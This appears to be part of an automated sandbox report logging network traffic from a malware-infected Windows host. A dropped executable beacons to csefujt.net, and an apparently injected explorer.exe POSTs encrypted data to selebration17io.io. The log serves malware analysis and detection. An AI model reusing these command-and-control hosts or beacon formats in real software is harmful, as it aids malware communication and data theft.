                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:21.083873987 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:20 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:21.205636978 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:21.449549913 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.6 | 49827 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:20.995029926 CET | 286 | OUT | POST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://whlyawtijntebx.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 305
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
Feb 5, 2024 12:14:20.995066881 CET | 305 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fd af 3f ea
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO?~SSutuV>#!Q?c\vRy'TVwM(OD[LG/P=em~1zx1t@"Y'*7U0G/*t:co2qq
Feb 5, 2024 12:14:21.251159906 CET | 194 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.6 | 49828 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:21.797250986 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:22.033667088 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.6 | 49829 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:22.361737013 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:22.609204054 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:22 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.6 | 49830 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:22.947249889 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:23.188909054 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:23 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.6 | 49831 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:23.545528889 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:23.782243967 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:23 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.6 | 49832 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:24.117058992 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:24.361047983 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.6 | 49833 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:24.712949038 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:24.949419022 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.6 | 49834 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:25.297821999 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:25.544548988 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.6 | 49835 | 91.215.85.120 | 80 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:25.698829889 CET | 288 | OUT | POST /index.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://cuhiokodwvirqcxc.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 236
Host: selebration17io.io
Feb 5, 2024 12:14:25.698879004 CET | 236 | OUT | Data Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 99 f9 5b b9
Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO[i}8K/tgN0Th!!="8@2[E7{#.~)R`4E.{6pup ]nF/i35tR:*0r?26.M9
Feb 5, 2024 12:14:25.954585075 CET | 194 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 05 Feb 2024 11:14:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7=[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.6 | 49836 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:25.886007071 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:26.127146959 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:26 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.6 | 49837 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:26.483295918 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:26.720006943 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:26 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.6 | 49838 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:27.054218054 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:27.298125982 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.6 | 49839 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:27.844743967 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:28.081578970 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.6 | 49840 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:28.459085941 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:28.702107906 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:28 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.6 | 49841 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:29.167968988 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:29.412574053 CET | 220 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:29 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.6 | 49842 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:29.766911983 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:30.003658056 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.6 | 49843 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:30.338670969 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:30.583293915 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.6 | 49844 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:30.977087975 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:31.219779968 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.4.33
Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
Data Ascii: e67b680813008c20


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.6 | 49845 | 185.196.8.22 | 80 | 4328 | C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:31.588088036 CET | 326 | OUT | GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
Host: csefujt.net
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 5, 2024 12:14:31.824461937 CET | 220 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Mon, 05 Feb 2024 11:14:31 GMT
